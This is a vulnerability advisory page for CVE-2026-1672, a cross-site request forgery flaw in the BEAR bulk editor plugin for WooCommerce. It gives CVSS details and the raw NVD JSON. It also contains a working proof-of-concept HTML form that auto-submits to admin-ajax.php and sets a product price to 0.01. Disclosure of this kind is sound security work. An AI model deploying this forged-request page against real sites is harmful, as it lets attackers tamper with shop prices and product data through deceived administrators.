Security Vulnerability Report
中文
CVE-2026-1672 CVSS 6.5 MEDIUM

CVE-2026-1672

Published: 2026-04-08 12:16:19
Last Modified: 2026-04-24 18:05:09
Source: [email protected]

Description

The BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.5. This is due to missing nonce validation on the woobe_redraw_table_row() function. This makes it possible for unauthenticated attackers to update WooCommerce product data including prices, descriptions, and other product fields via a forged request granted they can trick a site administrator or shop manager into performing an action such as clicking on a link.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

BEAR – Bulk Editor and Products Manager Professional for WooCommerce <= 1.1.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-1672 Description: Exploits missing nonce validation in woobe_redraw_table_row() to update product prices. Usage: Host this file and trick an authenticated admin into opening it. --> <html> <body> <form action="http://target-site.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="woobe_redraw_table_row" /> <input type="hidden" name="product_id" value="1" /> <input type="hidden" name="field_key" value="regular_price" /> <input type="hidden" name="field_value" value="0.01" /> <input type="submit" value="Submit Request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1672", "sourceIdentifier": "[email protected]", "published": "2026-04-08T12:16:19.277", "lastModified": "2026-04-24T18:05:09.240", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.5. This is due to missing nonce validation on the woobe_redraw_table_row() function. This makes it possible for unauthenticated attackers to update WooCommerce product data including prices, descriptions, and other product fields via a forged request granted they can trick a site administrator or shop manager into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/woo-bulk-editor/trunk/index.php#L782", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3457263/", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3465138/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bc3b5faa-1a29-4fa7-9146-d782adce0b1f?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.